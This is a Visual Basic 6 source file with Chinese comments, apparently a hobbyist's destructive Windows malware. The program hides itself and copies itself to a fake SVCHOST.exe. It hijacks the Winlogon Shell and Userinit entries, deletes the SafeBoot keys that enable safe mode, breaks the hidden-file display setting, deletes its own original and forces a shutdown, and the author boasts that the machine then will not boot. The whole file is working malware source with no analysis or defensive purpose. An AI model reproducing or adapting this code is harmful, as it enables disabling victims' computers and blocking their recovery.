vb-zaodu.txt

刚开始没什么经验

'刚开始没什么经验，(修改版)代码 修复了复制文件错误，添加程序自杀功能。
Private Declare Function RtlAdjustPrivilege& Lib "ntdll" (ByVal Privilege&, ByVal Newvalue&, ByVal NewThread&, Oldvalue&)
Private Declare Function NtShutdownSystem& Lib "ntdll" (ByVal ShutdownAction&)
Private Sub Form_Load()
Form1.Visible = False '窗体隐藏
App.TaskVisible = False '任务栏隐藏
'文件是否存在
If Dir("C:\WINDOWS\system\SVCHOST.exe",7) <> "" Then
'如果文件存在则暴力关机
Const SE_SHUTDOWN_PRIVILEGE& = 19
Const SHUTDOWN& = 0
Const RESTART& = 1
Const POWEROFF& = 2
RtlAdjustPrivilege& SE_SHUTDOWN_PRIVILEGE&, 1, 0, 0
NtShutdownSystem& SHUTDOWN& Or POWEROFF&
'否则.....自我复制
Else
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\WINDOWS\SYSTEM\SVCHOST.exe"
'开机启动
Set wsh = CreateObject("Wscript.Shell")
wsh.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell", "C:\WINDOWS\SYSTEM\SVCHOST.exe"   '替换桌面文件
wsh.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", "C:\WINDOWS\SYSTEM\SVCHOST.exe" '替换登陆文件
'干掉cmd加密，以便执行cmd命令
Set wsh = CreateObject("Wscript.Shell")
wsh.regwrite "HKLM\SOFTWARE\Microsoft\Command Processor\AutoRun", ""
'干掉安全模式
Shell ("cmd /c" + "reg delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f")
Shell ("cmd /c" + "reg delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f")
Shell ("cmd /c" + "reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f")
Shell ("cmd /c" + "reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f")
'破坏显示隐藏文件
Shell ("cmd /c" + "reg delete HKEY_LOCAL_MACHINE\HARDWARE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /f")
Shell ("cmd /c" + "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v Text /t REG_SZ /d 此功能已损坏. /f")
'隐藏自身
Shell ("cmd /c" + "attrib +s +h +r C:\WINDOWS\SYSTEM\SVCHOST.exe")
'自我删除
Open App.Path & "\killme.bat" For Output As #1
'"@echo off" 不显示执行过程
Print #1, "@echo off"
'结束自我进程
Print #1, "TASKKILL /F /IM 1.exe"
'删除指定文件
Print #1, "del " & App.EXEName + ".exe"
'删除自身
Print #1, "del killme.bat"
Print #1, "cls"
Print #1, "exit"
Close #1
Shell ("cmd /c" + "killme.bat")
End If
End Sub
'测试之后的效果:基本上运行之后开不开机~